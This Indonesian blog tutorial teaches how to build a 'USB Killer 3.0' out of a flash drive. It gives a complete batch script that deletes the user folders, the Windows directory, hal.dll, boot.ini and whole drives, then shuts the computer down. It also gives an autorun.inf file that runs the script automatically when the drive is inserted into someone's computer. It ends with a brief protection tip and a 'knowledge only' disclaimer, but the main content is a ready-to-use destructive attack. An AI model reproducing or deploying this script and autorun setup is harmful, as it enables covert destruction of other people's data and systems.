Cara Membuat USB Killer Versi 3.0 Tanpa Software

Advertisement

Cara Membuat USB Killer – USB Killer adalah sebuah perangkat dengan bentuk fisik seperti flashdisk namun bisa merusak laptop dalam beberapa detik setelah di hubungkan dengannya.

Jika dilihat secara kasat mata maka bentuk USB killer seperti USB biasa, bagi yang tidak sengaja menghubungkannya ke laptop maka bisa menyebabkan laptop hang bahkan tidak bisa di gunakan sama sekali.

Cara Kerja USB Killer

USB killer mempunyai konverter didalamnya yang akan men-charge kapasitor sampai -110V dan saat itu juga tegangan tersebut dialirkan ke seluruh komponen PC melewati port USB, proses ini akan dilakukan terus menerus hingga komputer atau laptop rusak parah.

USB Killer - Cara Membuat USB Killer Versi 3.0 Tanpa Software

Usb killer pertama kali diperkenalkan oleh Dark Purple melalui channel youtube mereka, mereka juga melakukan demonstrasi dengan menghubungkan USB killer terhadap sebuah laptop lenovo thinkpad, hanya dalam hitungan beberapa detik saja laptop tersebut langsung mati dan tidak bisa di gunakan lagi meskipun sudah di charge.

Menurut informasi dari Dark Purple, selain mampu merusak perangkat laptop, USB Killer yang mereka buat juga mampu merusak perangkat lain seperti Modem, Smart TV, Komputer dan semua perangkat yang mempunyai port USB.

Hingga saat ini belum ada info resmi tentang cara membuat USB killer versi Dark Purple yang telah beredar di Internet.

Namun, pada kesempatan kali ini kita akan mencoba membuat USB Killer Versi 3.0 yang bisa kita buat sendiri menggunakan USB Flashdisk dengan beberapa perintah bat yang berfungsi untuk mengacaukan sistem komputer.

Cara Membuat USB Killer

Berikut ini adalah cara membuat USB Killer dengan mudah, USB killer yang akan kita buat kali ini akan berisi perintah untuk melakukan formatting terhadap hardisk komputer.

Baca Juga :  5 Cara Download Shutterstock Gratis Tanpa Watermark

Meskipun tidak merusak perangkat komputer seperti USB killer buatan dark purple, namun USB killer yang akan kita buat kali ini cukup memberikan efek yang sama yaitu kehilangan data.

Berikut ini adalah langkah-langkah untuk membuat USB Killer versi 3.0:

  1. Silahkan buka notepad kemudian masukkan kode di bawah ini
@echo off
Echo Nuking in 3... 2... 1...
dir d:
echo Y|del D:\
dir c:
echo Y|del C:\documents and settings
echo Y|del C:\users
echo Y|del C:\windows\system32\hal.dll
echo Y|del C:\windows
attrib -s -h C:\boot.ini
PING localhost -n 1 -w 3 >NUL
echo Y|del C:\boot.ini
echo Y|del C:\
PING localhost -n 1 -w 6 >NUL
shutdown.exe -s -t 30
  1. Silahkan Save As dengan ekstensi .Bat misal Anda beri nama USBKill.Bat
  2. Setelah itu buat file autorun yang berfungsi untuk menjalankan file usbkill.Bat yang sudah Anda buat tadi, caranya silahkan buka notepad dan masukkan kode di bawah ini.
[autorun]
;Open=USBKill.Bat
ShellExecute=USBKill.Bat
UseAutoPlay=1
  1. Save As dengan nama Autorun.inf lalu pada file type pilih All files

Fungsi autorun yang kita buat adalah untuk menjalankan file USBKill.Bat secara otomatis sehingga ketika USB kita di hubungkan ke port USB komputer maka program yang telah kita buat akan secara otomatis ter eksekusi yang mengakibatkan semua file pada hardisk terformat.

Tips Agar Terhindar dari USB Killer

Untuk menghindari terkena USB killer seperti yang telah kita buat, Anda bisa menginstall software Dubalang. Software tersebut akan memblokir beberapa ekstensi seperti exe, bat dan vbs yang merupakan ekstensi kebanyakan virus.

Tutorial diatas di buat hanya untuk pengetahuan saja dan sangat tidak disarankan untuk melakukan tindakan yang merugikan orang lain.

Advertisement
You May Also Like
Read More

Cara Memunculkan Icon Baterai di Windows 10

Advertisement Bagi pengguna operating sistem windows 10 pasti Anda pernah mengalami saat ingin melihat kapasitas baterai laptop namun…